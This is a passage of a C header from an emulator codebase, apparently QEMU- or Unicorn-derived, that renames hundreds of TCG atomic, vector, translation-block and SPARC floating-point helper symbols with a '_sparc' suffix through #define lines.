helper_atomic_fetch_umaxw_le_mmu_sparc #define helper_atomic_smin_fetchw_le_mmu helper_atomic_smin_fetchw_le_mmu_sparc #define helper_atomic_umin_fetchw_le_mmu helper_atomic_umin_fetchw_le_mmu_sparc #define helper_atomic_smax_fetchw_le_mmu helper_atomic_smax_fetchw_le_mmu_sparc #define helper_atomic_umax_fetchw_le_mmu helper_atomic_umax_fetchw_le_mmu_sparc #define helper_atomic_cmpxchgw_be_mmu helper_atomic_cmpxchgw_be_mmu_sparc #define helper_atomic_xchgw_be_mmu helper_atomic_xchgw_be_mmu_sparc #define helper_atomic_fetch_andw_be_mmu helper_atomic_fetch_andw_be_mmu_sparc #define helper_atomic_fetch_orw_be_mmu helper_atomic_fetch_orw_be_mmu_sparc #define helper_atomic_fetch_xorw_be_mmu helper_atomic_fetch_xorw_be_mmu_sparc #define helper_atomic_and_fetchw_be_mmu helper_atomic_and_fetchw_be_mmu_sparc #define helper_atomic_or_fetchw_be_mmu helper_atomic_or_fetchw_be_mmu_sparc #define helper_atomic_xor_fetchw_be_mmu helper_atomic_xor_fetchw_be_mmu_sparc #define helper_atomic_fetch_sminw_be_mmu helper_atomic_fetch_sminw_be_mmu_sparc #define helper_atomic_fetch_uminw_be_mmu helper_atomic_fetch_uminw_be_mmu_sparc #define helper_atomic_fetch_smaxw_be_mmu helper_atomic_fetch_smaxw_be_mmu_sparc #define helper_atomic_fetch_umaxw_be_mmu helper_atomic_fetch_umaxw_be_mmu_sparc #define helper_atomic_smin_fetchw_be_mmu helper_atomic_smin_fetchw_be_mmu_sparc #define helper_atomic_umin_fetchw_be_mmu helper_atomic_umin_fetchw_be_mmu_sparc #define helper_atomic_smax_fetchw_be_mmu helper_atomic_smax_fetchw_be_mmu_sparc #define helper_atomic_umax_fetchw_be_mmu helper_atomic_umax_fetchw_be_mmu_sparc #define helper_atomic_fetch_addw_be_mmu helper_atomic_fetch_addw_be_mmu_sparc #define helper_atomic_add_fetchw_be_mmu helper_atomic_add_fetchw_be_mmu_sparc #define helper_atomic_cmpxchgl_le_mmu helper_atomic_cmpxchgl_le_mmu_sparc #define helper_atomic_xchgl_le_mmu helper_atomic_xchgl_le_mmu_sparc #define helper_atomic_fetch_addl_le_mmu helper_atomic_fetch_addl_le_mmu_sparc #define helper_atomic_fetch_andl_le_mmu helper_atomic_fetch_andl_le_mmu_sparc #define helper_atomic_fetch_orl_le_mmu helper_atomic_fetch_orl_le_mmu_sparc #define helper_atomic_fetch_xorl_le_mmu helper_atomic_fetch_xorl_le_mmu_sparc #define helper_atomic_add_fetchl_le_mmu helper_atomic_add_fetchl_le_mmu_sparc #define helper_atomic_and_fetchl_le_mmu helper_atomic_and_fetchl_le_mmu_sparc #define helper_atomic_or_fetchl_le_mmu helper_atomic_or_fetchl_le_mmu_sparc #define helper_atomic_xor_fetchl_le_mmu helper_atomic_xor_fetchl_le_mmu_sparc #define helper_atomic_fetch_sminl_le_mmu helper_atomic_fetch_sminl_le_mmu_sparc #define helper_atomic_fetch_uminl_le_mmu helper_atomic_fetch_uminl_le_mmu_sparc #define helper_atomic_fetch_smaxl_le_mmu helper_atomic_fetch_smaxl_le_mmu_sparc #define helper_atomic_fetch_umaxl_le_mmu helper_atomic_fetch_umaxl_le_mmu_sparc #define helper_atomic_smin_fetchl_le_mmu helper_atomic_smin_fetchl_le_mmu_sparc #define helper_atomic_umin_fetchl_le_mmu helper_atomic_umin_fetchl_le_mmu_sparc #define helper_atomic_smax_fetchl_le_mmu helper_atomic_smax_fetchl_le_mmu_sparc #define helper_atomic_umax_fetchl_le_mmu helper_atomic_umax_fetchl_le_mmu_sparc #define helper_atomic_cmpxchgl_be_mmu helper_atomic_cmpxchgl_be_mmu_sparc #define helper_atomic_xchgl_be_mmu helper_atomic_xchgl_be_mmu_sparc #define helper_atomic_fetch_andl_be_mmu helper_atomic_fetch_andl_be_mmu_sparc #define helper_atomic_fetch_orl_be_mmu helper_atomic_fetch_orl_be_mmu_sparc #define helper_atomic_fetch_xorl_be_mmu helper_atomic_fetch_xorl_be_mmu_sparc #define helper_atomic_and_fetchl_be_mmu helper_atomic_and_fetchl_be_mmu_sparc #define helper_atomic_or_fetchl_be_mmu helper_atomic_or_fetchl_be_mmu_sparc #define helper_atomic_xor_fetchl_be_mmu helper_atomic_xor_fetchl_be_mmu_sparc #define helper_atomic_fetch_sminl_be_mmu helper_atomic_fetch_sminl_be_mmu_sparc #define helper_atomic_fetch_uminl_be_mmu helper_atomic_fetch_uminl_be_mmu_sparc #define helper_atomic_fetch_smaxl_be_mmu helper_atomic_fetch_smaxl_be_mmu_sparc #define helper_atomic_fetch_umaxl_be_mmu helper_atomic_fetch_umaxl_be_mmu_sparc #define helper_atomic_smin_fetchl_be_mmu helper_atomic_smin_fetchl_be_mmu_sparc #define helper_atomic_umin_fetchl_be_mmu helper_atomic_umin_fetchl_be_mmu_sparc #define helper_atomic_smax_fetchl_be_mmu helper_atomic_smax_fetchl_be_mmu_sparc #define helper_atomic_umax_fetchl_be_mmu helper_atomic_umax_fetchl_be_mmu_sparc #define helper_atomic_fetch_addl_be_mmu helper_atomic_fetch_addl_be_mmu_sparc #define helper_atomic_add_fetchl_be_mmu helper_atomic_add_fetchl_be_mmu_sparc #define helper_atomic_cmpxchgq_le_mmu helper_atomic_cmpxchgq_le_mmu_sparc #define helper_atomic_xchgq_le_mmu helper_atomic_xchgq_le_mmu_sparc #define helper_atomic_fetch_addq_le_mmu helper_atomic_fetch_addq_le_mmu_sparc #define helper_atomic_fetch_andq_le_mmu helper_atomic_fetch_andq_le_mmu_sparc #define helper_atomic_fetch_orq_le_mmu helper_atomic_fetch_orq_le_mmu_sparc #define helper_atomic_fetch_xorq_le_mmu helper_atomic_fetch_xorq_le_mmu_sparc #define helper_atomic_add_fetchq_le_mmu helper_atomic_add_fetchq_le_mmu_sparc #define helper_atomic_and_fetchq_le_mmu helper_atomic_and_fetchq_le_mmu_sparc #define helper_atomic_or_fetchq_le_mmu helper_atomic_or_fetchq_le_mmu_sparc #define helper_atomic_xor_fetchq_le_mmu helper_atomic_xor_fetchq_le_mmu_sparc #define helper_atomic_fetch_sminq_le_mmu helper_atomic_fetch_sminq_le_mmu_sparc #define helper_atomic_fetch_uminq_le_mmu helper_atomic_fetch_uminq_le_mmu_sparc #define helper_atomic_fetch_smaxq_le_mmu helper_atomic_fetch_smaxq_le_mmu_sparc #define helper_atomic_fetch_umaxq_le_mmu helper_atomic_fetch_umaxq_le_mmu_sparc #define helper_atomic_smin_fetchq_le_mmu helper_atomic_smin_fetchq_le_mmu_sparc #define helper_atomic_umin_fetchq_le_mmu helper_atomic_umin_fetchq_le_mmu_sparc #define helper_atomic_smax_fetchq_le_mmu helper_atomic_smax_fetchq_le_mmu_sparc #define helper_atomic_umax_fetchq_le_mmu helper_atomic_umax_fetchq_le_mmu_sparc #define helper_atomic_cmpxchgq_be_mmu helper_atomic_cmpxchgq_be_mmu_sparc #define helper_atomic_xchgq_be_mmu helper_atomic_xchgq_be_mmu_sparc #define helper_atomic_fetch_andq_be_mmu helper_atomic_fetch_andq_be_mmu_sparc #define helper_atomic_fetch_orq_be_mmu helper_atomic_fetch_orq_be_mmu_sparc #define helper_atomic_fetch_xorq_be_mmu helper_atomic_fetch_xorq_be_mmu_sparc #define helper_atomic_and_fetchq_be_mmu helper_atomic_and_fetchq_be_mmu_sparc #define helper_atomic_or_fetchq_be_mmu helper_atomic_or_fetchq_be_mmu_sparc #define helper_atomic_xor_fetchq_be_mmu helper_atomic_xor_fetchq_be_mmu_sparc #define helper_atomic_fetch_sminq_be_mmu helper_atomic_fetch_sminq_be_mmu_sparc #define helper_atomic_fetch_uminq_be_mmu helper_atomic_fetch_uminq_be_mmu_sparc #define helper_atomic_fetch_smaxq_be_mmu helper_atomic_fetch_smaxq_be_mmu_sparc #define helper_atomic_fetch_umaxq_be_mmu helper_atomic_fetch_umaxq_be_mmu_sparc #define helper_atomic_smin_fetchq_be_mmu helper_atomic_smin_fetchq_be_mmu_sparc #define helper_atomic_umin_fetchq_be_mmu helper_atomic_umin_fetchq_be_mmu_sparc #define helper_atomic_smax_fetchq_be_mmu helper_atomic_smax_fetchq_be_mmu_sparc #define helper_atomic_umax_fetchq_be_mmu helper_atomic_umax_fetchq_be_mmu_sparc #define helper_atomic_fetch_addq_be_mmu helper_atomic_fetch_addq_be_mmu_sparc #define helper_atomic_add_fetchq_be_mmu helper_atomic_add_fetchq_be_mmu_sparc #define helper_atomic_cmpxchgb helper_atomic_cmpxchgb_sparc #define helper_atomic_xchgb helper_atomic_xchgb_sparc #define helper_atomic_fetch_addb helper_atomic_fetch_addb_sparc #define helper_atomic_fetch_andb helper_atomic_fetch_andb_sparc #define helper_atomic_fetch_orb helper_atomic_fetch_orb_sparc #define helper_atomic_fetch_xorb helper_atomic_fetch_xorb_sparc #define helper_atomic_add_fetchb helper_atomic_add_fetchb_sparc #define helper_atomic_and_fetchb helper_atomic_and_fetchb_sparc #define helper_atomic_or_fetchb helper_atomic_or_fetchb_sparc #define helper_atomic_xor_fetchb helper_atomic_xor_fetchb_sparc #define helper_atomic_fetch_sminb helper_atomic_fetch_sminb_sparc #define helper_atomic_fetch_uminb helper_atomic_fetch_uminb_sparc #define helper_atomic_fetch_smaxb helper_atomic_fetch_smaxb_sparc #define helper_atomic_fetch_umaxb helper_atomic_fetch_umaxb_sparc #define helper_atomic_smin_fetchb helper_atomic_smin_fetchb_sparc #define helper_atomic_umin_fetchb helper_atomic_umin_fetchb_sparc #define helper_atomic_smax_fetchb helper_atomic_smax_fetchb_sparc #define helper_atomic_umax_fetchb helper_atomic_umax_fetchb_sparc #define helper_atomic_cmpxchgw_le helper_atomic_cmpxchgw_le_sparc #define helper_atomic_xchgw_le helper_atomic_xchgw_le_sparc #define helper_atomic_fetch_addw_le helper_atomic_fetch_addw_le_sparc #define helper_atomic_fetch_andw_le helper_atomic_fetch_andw_le_sparc #define helper_atomic_fetch_orw_le helper_atomic_fetch_orw_le_sparc #define helper_atomic_fetch_xorw_le helper_atomic_fetch_xorw_le_sparc #define helper_atomic_add_fetchw_le helper_atomic_add_fetchw_le_sparc #define helper_atomic_and_fetchw_le helper_atomic_and_fetchw_le_sparc #define helper_atomic_or_fetchw_le helper_atomic_or_fetchw_le_sparc #define helper_atomic_xor_fetchw_le helper_atomic_xor_fetchw_le_sparc #define helper_atomic_fetch_sminw_le helper_atomic_fetch_sminw_le_sparc #define helper_atomic_fetch_uminw_le helper_atomic_fetch_uminw_le_sparc #define helper_atomic_fetch_smaxw_le helper_atomic_fetch_smaxw_le_sparc #define helper_atomic_fetch_umaxw_le helper_atomic_fetch_umaxw_le_sparc #define helper_atomic_smin_fetchw_le helper_atomic_smin_fetchw_le_sparc #define helper_atomic_umin_fetchw_le helper_atomic_umin_fetchw_le_sparc #define helper_atomic_smax_fetchw_le helper_atomic_smax_fetchw_le_sparc #define helper_atomic_umax_fetchw_le helper_atomic_umax_fetchw_le_sparc #define helper_atomic_cmpxchgw_be helper_atomic_cmpxchgw_be_sparc #define helper_atomic_xchgw_be helper_atomic_xchgw_be_sparc #define helper_atomic_fetch_andw_be helper_atomic_fetch_andw_be_sparc #define helper_atomic_fetch_orw_be helper_atomic_fetch_orw_be_sparc #define helper_atomic_fetch_xorw_be helper_atomic_fetch_xorw_be_sparc #define helper_atomic_and_fetchw_be helper_atomic_and_fetchw_be_sparc #define helper_atomic_or_fetchw_be helper_atomic_or_fetchw_be_sparc #define helper_atomic_xor_fetchw_be helper_atomic_xor_fetchw_be_sparc #define helper_atomic_fetch_sminw_be helper_atomic_fetch_sminw_be_sparc #define helper_atomic_fetch_uminw_be helper_atomic_fetch_uminw_be_sparc #define helper_atomic_fetch_smaxw_be helper_atomic_fetch_smaxw_be_sparc #define helper_atomic_fetch_umaxw_be helper_atomic_fetch_umaxw_be_sparc #define helper_atomic_smin_fetchw_be helper_atomic_smin_fetchw_be_sparc #define helper_atomic_umin_fetchw_be helper_atomic_umin_fetchw_be_sparc #define helper_atomic_smax_fetchw_be helper_atomic_smax_fetchw_be_sparc #define helper_atomic_umax_fetchw_be helper_atomic_umax_fetchw_be_sparc #define helper_atomic_fetch_addw_be helper_atomic_fetch_addw_be_sparc #define helper_atomic_add_fetchw_be helper_atomic_add_fetchw_be_sparc #define helper_atomic_cmpxchgl_le helper_atomic_cmpxchgl_le_sparc #define helper_atomic_xchgl_le helper_atomic_xchgl_le_sparc #define helper_atomic_fetch_addl_le helper_atomic_fetch_addl_le_sparc #define helper_atomic_fetch_andl_le helper_atomic_fetch_andl_le_sparc #define helper_atomic_fetch_orl_le helper_atomic_fetch_orl_le_sparc #define helper_atomic_fetch_xorl_le helper_atomic_fetch_xorl_le_sparc #define helper_atomic_add_fetchl_le helper_atomic_add_fetchl_le_sparc #define helper_atomic_and_fetchl_le helper_atomic_and_fetchl_le_sparc #define helper_atomic_or_fetchl_le helper_atomic_or_fetchl_le_sparc #define helper_atomic_xor_fetchl_le helper_atomic_xor_fetchl_le_sparc #define helper_atomic_fetch_sminl_le helper_atomic_fetch_sminl_le_sparc #define helper_atomic_fetch_uminl_le helper_atomic_fetch_uminl_le_sparc #define helper_atomic_fetch_smaxl_le helper_atomic_fetch_smaxl_le_sparc #define helper_atomic_fetch_umaxl_le helper_atomic_fetch_umaxl_le_sparc #define helper_atomic_smin_fetchl_le helper_atomic_smin_fetchl_le_sparc #define helper_atomic_umin_fetchl_le helper_atomic_umin_fetchl_le_sparc #define helper_atomic_smax_fetchl_le helper_atomic_smax_fetchl_le_sparc #define helper_atomic_umax_fetchl_le helper_atomic_umax_fetchl_le_sparc #define helper_atomic_cmpxchgl_be helper_atomic_cmpxchgl_be_sparc #define helper_atomic_xchgl_be helper_atomic_xchgl_be_sparc #define helper_atomic_fetch_andl_be helper_atomic_fetch_andl_be_sparc #define helper_atomic_fetch_orl_be helper_atomic_fetch_orl_be_sparc #define helper_atomic_fetch_xorl_be helper_atomic_fetch_xorl_be_sparc #define helper_atomic_and_fetchl_be helper_atomic_and_fetchl_be_sparc #define helper_atomic_or_fetchl_be helper_atomic_or_fetchl_be_sparc #define helper_atomic_xor_fetchl_be helper_atomic_xor_fetchl_be_sparc #define helper_atomic_fetch_sminl_be helper_atomic_fetch_sminl_be_sparc #define helper_atomic_fetch_uminl_be helper_atomic_fetch_uminl_be_sparc #define helper_atomic_fetch_smaxl_be helper_atomic_fetch_smaxl_be_sparc #define helper_atomic_fetch_umaxl_be helper_atomic_fetch_umaxl_be_sparc #define helper_atomic_smin_fetchl_be helper_atomic_smin_fetchl_be_sparc #define helper_atomic_umin_fetchl_be helper_atomic_umin_fetchl_be_sparc #define helper_atomic_smax_fetchl_be helper_atomic_smax_fetchl_be_sparc #define helper_atomic_umax_fetchl_be helper_atomic_umax_fetchl_be_sparc #define helper_atomic_fetch_addl_be helper_atomic_fetch_addl_be_sparc #define helper_atomic_add_fetchl_be helper_atomic_add_fetchl_be_sparc #define helper_atomic_cmpxchgq_le helper_atomic_cmpxchgq_le_sparc #define helper_atomic_xchgq_le helper_atomic_xchgq_le_sparc #define helper_atomic_fetch_addq_le helper_atomic_fetch_addq_le_sparc #define helper_atomic_fetch_andq_le helper_atomic_fetch_andq_le_sparc #define helper_atomic_fetch_orq_le helper_atomic_fetch_orq_le_sparc #define helper_atomic_fetch_xorq_le helper_atomic_fetch_xorq_le_sparc #define helper_atomic_add_fetchq_le helper_atomic_add_fetchq_le_sparc #define helper_atomic_and_fetchq_le helper_atomic_and_fetchq_le_sparc #define helper_atomic_or_fetchq_le helper_atomic_or_fetchq_le_sparc #define helper_atomic_xor_fetchq_le helper_atomic_xor_fetchq_le_sparc #define helper_atomic_fetch_sminq_le helper_atomic_fetch_sminq_le_sparc #define helper_atomic_fetch_uminq_le helper_atomic_fetch_uminq_le_sparc #define helper_atomic_fetch_smaxq_le helper_atomic_fetch_smaxq_le_sparc #define helper_atomic_fetch_umaxq_le helper_atomic_fetch_umaxq_le_sparc #define helper_atomic_smin_fetchq_le helper_atomic_smin_fetchq_le_sparc #define helper_atomic_umin_fetchq_le helper_atomic_umin_fetchq_le_sparc #define helper_atomic_smax_fetchq_le helper_atomic_smax_fetchq_le_sparc #define helper_atomic_umax_fetchq_le helper_atomic_umax_fetchq_le_sparc #define helper_atomic_cmpxchgq_be helper_atomic_cmpxchgq_be_sparc #define helper_atomic_xchgq_be helper_atomic_xchgq_be_sparc #define helper_atomic_fetch_andq_be helper_atomic_fetch_andq_be_sparc #define helper_atomic_fetch_orq_be helper_atomic_fetch_orq_be_sparc #define helper_atomic_fetch_xorq_be helper_atomic_fetch_xorq_be_sparc #define helper_atomic_and_fetchq_be helper_atomic_and_fetchq_be_sparc #define helper_atomic_or_fetchq_be helper_atomic_or_fetchq_be_sparc #define helper_atomic_xor_fetchq_be helper_atomic_xor_fetchq_be_sparc #define helper_atomic_fetch_sminq_be helper_atomic_fetch_sminq_be_sparc #define helper_atomic_fetch_uminq_be helper_atomic_fetch_uminq_be_sparc #define helper_atomic_fetch_smaxq_be helper_atomic_fetch_smaxq_be_sparc #define helper_atomic_fetch_umaxq_be helper_atomic_fetch_umaxq_be_sparc #define helper_atomic_smin_fetchq_be helper_atomic_smin_fetchq_be_sparc #define helper_atomic_umin_fetchq_be helper_atomic_umin_fetchq_be_sparc #define helper_atomic_smax_fetchq_be helper_atomic_smax_fetchq_be_sparc #define helper_atomic_umax_fetchq_be helper_atomic_umax_fetchq_be_sparc #define helper_atomic_fetch_addq_be helper_atomic_fetch_addq_be_sparc #define helper_atomic_add_fetchq_be helper_atomic_add_fetchq_be_sparc #define cpu_ldub_code cpu_ldub_code_sparc #define cpu_lduw_code cpu_lduw_code_sparc #define cpu_ldl_code cpu_ldl_code_sparc #define cpu_ldq_code cpu_ldq_code_sparc #define helper_div_i32 helper_div_i32_sparc #define helper_rem_i32 helper_rem_i32_sparc #define helper_divu_i32 helper_divu_i32_sparc #define helper_remu_i32 helper_remu_i32_sparc #define helper_shl_i64 helper_shl_i64_sparc #define helper_shr_i64 helper_shr_i64_sparc #define helper_sar_i64 helper_sar_i64_sparc #define helper_div_i64 helper_div_i64_sparc #define helper_rem_i64 helper_rem_i64_sparc #define helper_divu_i64 helper_divu_i64_sparc #define helper_remu_i64 helper_remu_i64_sparc #define helper_muluh_i64 helper_muluh_i64_sparc #define helper_mulsh_i64 helper_mulsh_i64_sparc #define helper_clz_i32 helper_clz_i32_sparc #define helper_ctz_i32 helper_ctz_i32_sparc #define helper_clz_i64 helper_clz_i64_sparc #define helper_ctz_i64 helper_ctz_i64_sparc #define helper_clrsb_i32 helper_clrsb_i32_sparc #define helper_clrsb_i64 helper_clrsb_i64_sparc #define helper_ctpop_i32 helper_ctpop_i32_sparc #define helper_ctpop_i64 helper_ctpop_i64_sparc #define helper_lookup_tb_ptr helper_lookup_tb_ptr_sparc #define helper_exit_atomic helper_exit_atomic_sparc #define helper_gvec_add8 helper_gvec_add8_sparc #define helper_gvec_add16 helper_gvec_add16_sparc #define helper_gvec_add32 helper_gvec_add32_sparc #define helper_gvec_add64 helper_gvec_add64_sparc #define helper_gvec_adds8 helper_gvec_adds8_sparc #define helper_gvec_adds16 helper_gvec_adds16_sparc #define helper_gvec_adds32 helper_gvec_adds32_sparc #define helper_gvec_adds64 helper_gvec_adds64_sparc #define helper_gvec_sub8 helper_gvec_sub8_sparc #define helper_gvec_sub16 helper_gvec_sub16_sparc #define helper_gvec_sub32 helper_gvec_sub32_sparc #define helper_gvec_sub64 helper_gvec_sub64_sparc #define helper_gvec_subs8 helper_gvec_subs8_sparc #define helper_gvec_subs16 helper_gvec_subs16_sparc #define helper_gvec_subs32 helper_gvec_subs32_sparc #define helper_gvec_subs64 helper_gvec_subs64_sparc #define helper_gvec_mul8 helper_gvec_mul8_sparc #define helper_gvec_mul16 helper_gvec_mul16_sparc #define helper_gvec_mul32 helper_gvec_mul32_sparc #define helper_gvec_mul64 helper_gvec_mul64_sparc #define helper_gvec_muls8 helper_gvec_muls8_sparc #define helper_gvec_muls16 helper_gvec_muls16_sparc #define helper_gvec_muls32 helper_gvec_muls32_sparc #define helper_gvec_muls64 helper_gvec_muls64_sparc #define helper_gvec_neg8 helper_gvec_neg8_sparc #define helper_gvec_neg16 helper_gvec_neg16_sparc #define helper_gvec_neg32 helper_gvec_neg32_sparc #define helper_gvec_neg64 helper_gvec_neg64_sparc #define helper_gvec_abs8 helper_gvec_abs8_sparc #define helper_gvec_abs16 helper_gvec_abs16_sparc #define helper_gvec_abs32 helper_gvec_abs32_sparc #define helper_gvec_abs64 helper_gvec_abs64_sparc #define helper_gvec_mov helper_gvec_mov_sparc #define helper_gvec_dup64 helper_gvec_dup64_sparc #define helper_gvec_dup32 helper_gvec_dup32_sparc #define helper_gvec_dup16 helper_gvec_dup16_sparc #define helper_gvec_dup8 helper_gvec_dup8_sparc #define helper_gvec_not helper_gvec_not_sparc #define helper_gvec_and helper_gvec_and_sparc #define helper_gvec_or helper_gvec_or_sparc #define helper_gvec_xor helper_gvec_xor_sparc #define helper_gvec_andc helper_gvec_andc_sparc #define helper_gvec_orc helper_gvec_orc_sparc #define helper_gvec_nand helper_gvec_nand_sparc #define helper_gvec_nor helper_gvec_nor_sparc #define helper_gvec_eqv helper_gvec_eqv_sparc #define helper_gvec_ands helper_gvec_ands_sparc #define helper_gvec_xors helper_gvec_xors_sparc #define helper_gvec_ors helper_gvec_ors_sparc #define helper_gvec_shl8i helper_gvec_shl8i_sparc #define helper_gvec_shl16i helper_gvec_shl16i_sparc #define helper_gvec_shl32i helper_gvec_shl32i_sparc #define helper_gvec_shl64i helper_gvec_shl64i_sparc #define helper_gvec_shr8i helper_gvec_shr8i_sparc #define helper_gvec_shr16i helper_gvec_shr16i_sparc #define helper_gvec_shr32i helper_gvec_shr32i_sparc #define helper_gvec_shr64i helper_gvec_shr64i_sparc #define helper_gvec_sar8i helper_gvec_sar8i_sparc #define helper_gvec_sar16i helper_gvec_sar16i_sparc #define helper_gvec_sar32i helper_gvec_sar32i_sparc #define helper_gvec_sar64i helper_gvec_sar64i_sparc #define helper_gvec_shl8v helper_gvec_shl8v_sparc #define helper_gvec_shl16v helper_gvec_shl16v_sparc #define helper_gvec_shl32v helper_gvec_shl32v_sparc #define helper_gvec_shl64v helper_gvec_shl64v_sparc #define helper_gvec_shr8v helper_gvec_shr8v_sparc #define helper_gvec_shr16v helper_gvec_shr16v_sparc #define helper_gvec_shr32v helper_gvec_shr32v_sparc #define helper_gvec_shr64v helper_gvec_shr64v_sparc #define helper_gvec_sar8v helper_gvec_sar8v_sparc #define helper_gvec_sar16v helper_gvec_sar16v_sparc #define helper_gvec_sar32v helper_gvec_sar32v_sparc #define helper_gvec_sar64v helper_gvec_sar64v_sparc #define helper_gvec_eq8 helper_gvec_eq8_sparc #define helper_gvec_ne8 helper_gvec_ne8_sparc #define helper_gvec_lt8 helper_gvec_lt8_sparc #define helper_gvec_le8 helper_gvec_le8_sparc #define helper_gvec_ltu8 helper_gvec_ltu8_sparc #define helper_gvec_leu8 helper_gvec_leu8_sparc #define helper_gvec_eq16 helper_gvec_eq16_sparc #define helper_gvec_ne16 helper_gvec_ne16_sparc #define helper_gvec_lt16 helper_gvec_lt16_sparc #define helper_gvec_le16 helper_gvec_le16_sparc #define helper_gvec_ltu16 helper_gvec_ltu16_sparc #define helper_gvec_leu16 helper_gvec_leu16_sparc #define helper_gvec_eq32 helper_gvec_eq32_sparc #define helper_gvec_ne32 helper_gvec_ne32_sparc #define helper_gvec_lt32 helper_gvec_lt32_sparc #define helper_gvec_le32 helper_gvec_le32_sparc #define helper_gvec_ltu32 helper_gvec_ltu32_sparc #define helper_gvec_leu32 helper_gvec_leu32_sparc #define helper_gvec_eq64 helper_gvec_eq64_sparc #define helper_gvec_ne64 helper_gvec_ne64_sparc #define helper_gvec_lt64 helper_gvec_lt64_sparc #define helper_gvec_le64 helper_gvec_le64_sparc #define helper_gvec_ltu64 helper_gvec_ltu64_sparc #define helper_gvec_leu64 helper_gvec_leu64_sparc #define helper_gvec_ssadd8 helper_gvec_ssadd8_sparc #define helper_gvec_ssadd16 helper_gvec_ssadd16_sparc #define helper_gvec_ssadd32 helper_gvec_ssadd32_sparc #define helper_gvec_ssadd64 helper_gvec_ssadd64_sparc #define helper_gvec_sssub8 helper_gvec_sssub8_sparc #define helper_gvec_sssub16 helper_gvec_sssub16_sparc #define helper_gvec_sssub32 helper_gvec_sssub32_sparc #define helper_gvec_sssub64 helper_gvec_sssub64_sparc #define helper_gvec_usadd8 helper_gvec_usadd8_sparc #define helper_gvec_usadd16 helper_gvec_usadd16_sparc #define helper_gvec_usadd32 helper_gvec_usadd32_sparc #define helper_gvec_usadd64 helper_gvec_usadd64_sparc #define helper_gvec_ussub8 helper_gvec_ussub8_sparc #define helper_gvec_ussub16 helper_gvec_ussub16_sparc #define helper_gvec_ussub32 helper_gvec_ussub32_sparc #define helper_gvec_ussub64 helper_gvec_ussub64_sparc #define helper_gvec_smin8 helper_gvec_smin8_sparc #define helper_gvec_smin16 helper_gvec_smin16_sparc #define helper_gvec_smin32 helper_gvec_smin32_sparc #define helper_gvec_smin64 helper_gvec_smin64_sparc #define helper_gvec_smax8 helper_gvec_smax8_sparc #define helper_gvec_smax16 helper_gvec_smax16_sparc #define helper_gvec_smax32 helper_gvec_smax32_sparc #define helper_gvec_smax64 helper_gvec_smax64_sparc #define helper_gvec_umin8 helper_gvec_umin8_sparc #define helper_gvec_umin16 helper_gvec_umin16_sparc #define helper_gvec_umin32 helper_gvec_umin32_sparc #define helper_gvec_umin64 helper_gvec_umin64_sparc #define helper_gvec_umax8 helper_gvec_umax8_sparc #define helper_gvec_umax16 helper_gvec_umax16_sparc #define helper_gvec_umax32 helper_gvec_umax32_sparc #define helper_gvec_umax64 helper_gvec_umax64_sparc #define helper_gvec_bitsel helper_gvec_bitsel_sparc #define cpu_restore_state cpu_restore_state_sparc #define page_collection_lock page_collection_lock_sparc #define page_collection_unlock page_collection_unlock_sparc #define free_code_gen_buffer free_code_gen_buffer_sparc #define tcg_exec_init tcg_exec_init_sparc #define tb_cleanup tb_cleanup_sparc #define tb_flush tb_flush_sparc #define tb_phys_invalidate tb_phys_invalidate_sparc #define tb_gen_code tb_gen_code_sparc #define tb_exec_lock tb_exec_lock_sparc #define tb_exec_unlock tb_exec_unlock_sparc #define tb_invalidate_phys_page_range tb_invalidate_phys_page_range_sparc #define tb_invalidate_phys_range tb_invalidate_phys_range_sparc #define tb_invalidate_phys_page_fast tb_invalidate_phys_page_fast_sparc #define tb_check_watchpoint tb_check_watchpoint_sparc #define cpu_io_recompile cpu_io_recompile_sparc #define tb_flush_jmp_cache tb_flush_jmp_cache_sparc #define tcg_flush_softmmu_tlb tcg_flush_softmmu_tlb_sparc #define translator_loop_temp_check translator_loop_temp_check_sparc #define translator_loop translator_loop_sparc #define helper_atomic_cmpxchgo_le_mmu helper_atomic_cmpxchgo_le_mmu_sparc #define helper_atomic_cmpxchgo_be_mmu helper_atomic_cmpxchgo_be_mmu_sparc #define helper_atomic_ldo_le_mmu helper_atomic_ldo_le_mmu_sparc #define helper_atomic_ldo_be_mmu helper_atomic_ldo_be_mmu_sparc #define helper_atomic_sto_le_mmu helper_atomic_sto_le_mmu_sparc #define helper_atomic_sto_be_mmu helper_atomic_sto_be_mmu_sparc #define unassigned_mem_ops unassigned_mem_ops_sparc #define floatx80_infinity floatx80_infinity_sparc #define dup_const_func dup_const_func_sparc #define gen_helper_raise_exception gen_helper_raise_exception_sparc #define gen_helper_raise_interrupt gen_helper_raise_interrupt_sparc #define gen_helper_vfp_get_fpscr gen_helper_vfp_get_fpscr_sparc #define gen_helper_vfp_set_fpscr gen_helper_vfp_set_fpscr_sparc #define gen_helper_cpsr_read gen_helper_cpsr_read_sparc #define gen_helper_cpsr_write gen_helper_cpsr_write_sparc #define tlb_reset_dirty_by_vaddr tlb_reset_dirty_by_vaddr_sparc #define helper_compute_psr helper_compute_psr_sparc #define helper_compute_C_icc helper_compute_C_icc_sparc #define cpu_sparc_set_id cpu_sparc_set_id_sparc #define cpu_sparc_init cpu_sparc_init_sparc #define helper_check_ieee_exceptions helper_check_ieee_exceptions_sparc #define helper_fadds helper_fadds_sparc #define helper_faddd helper_faddd_sparc #define helper_faddq helper_faddq_sparc #define helper_fsubs helper_fsubs_sparc #define helper_fsubd helper_fsubd_sparc #define helper_fsubq helper_fsubq_sparc #define helper_fmuls helper_fmuls_sparc #define helper_fmuld helper_fmuld_sparc #define helper_fmulq helper_fmulq_sparc #define helper_fdivs helper_fdivs_sparc #define helper_fdivd helper_fdivd_sparc #define helper_fdivq helper_fdivq_sparc #define helper_fsmuld helper_fsmuld_sparc #define helper_fsmulq helper_fsmulq_sparc #define helper_fdmulq helper_fdmulq_sparc #define helper_fnegs helper_fnegs_sparc #define helper_fnegd helper_fnegd_sparc #define helper_fnegq helper_fnegq_sparc #define helper_fitos helper_fitos_sparc #define helper_fitod helper_fitod_sparc #define helper_fitoq helper_fitoq_sparc #define helper_fxtos helper_fxtos_sparc #define helper_fxtod helper_fxtod_sparc #define helper_fxtoq helper_fxtoq_sparc #define helper_fdtos helper_fdtos_sparc #define helper_fstod helper_fstod_sparc #define helper_fqtos helper_fqtos_sparc #define helper_fstoq helper_fstoq_sparc #define helper_fqtod helper_fqtod_sparc #define helper_fdtoq helper_fdtoq_sparc #define helper_fstoi helper_fstoi_sparc #define helper_fdtoi helper_fdtoi_sparc #define helper_fqtoi helper_fqtoi_sparc #define helper_fstox helper_fstox_sparc #define helper_fdtox helper_fdtox_sparc #define helper_fqtox helper_fqtox_sparc #define helper_fabss helper_fabss_sparc #define helper_fabsd 